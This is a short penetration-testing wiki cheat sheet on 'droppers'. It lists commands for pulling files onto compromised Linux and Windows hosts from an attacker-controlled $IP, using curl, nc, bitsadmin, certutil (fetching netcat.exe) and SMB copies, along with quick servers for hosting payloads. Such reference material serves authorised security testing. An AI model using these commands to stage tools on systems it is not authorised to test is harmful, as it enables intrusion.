Droppers

From pentestwiki.org

Classic methods

Linux

$curl -k https://$IP/file > file
$nc -nvv $IP 8080 > file
$scp $FILE [email protected]$IP:~


Windows

Powershell

See also Powercat

VBscript

ROBOCOPY

C:>NET USE \\$IP\IPC$ /USER:DOMAIN\USER
C:>ROBOCOPY \\$IP\DATA\ C:\DATA\ /NP /TEE /E /dcopy:T /Z
C:>NET USE \\$IP\IPC$ /D


BITSAdmin

https://docs.microsoft.com/en-us/windows/desktop/Bits/bitsadmin-tool

  • Direct Transfer:
C:>bitsadmin /transfer myDownloadJob /download /priority normal http://$IP/$FILE c:\$FILE


  • Using a download queue:
C:>bitsadmin /create myDownloadJob
C:>bitsadmin /addfile myDownloadJob http://$IP/$FILE c:\$FILE


Certutil

C:>certutil.exe -urlcache -split -f "https://$IP/files/netcat.exe" nc.exe


Notepad

C:>notepad.exe http://$IP/file.txt



Living Off the Land (LOLbins) for Windows

Links:

Examples:

C:>hh.exe C:\windows\system32\calc.exe

C# compiler built-in command:

C:>csc.exe


Using known protocols

HTTP

  • With Python
$python -m SimpleHTTPServer
root #python -m SimpleHTTPServer 80


  • With php
$php -S localhost:8000


FTP

root #pip install pyftpdlib
root #python -m pyftpdlib


SMB

root #impacket-smbserver PAYLOADS /root/payload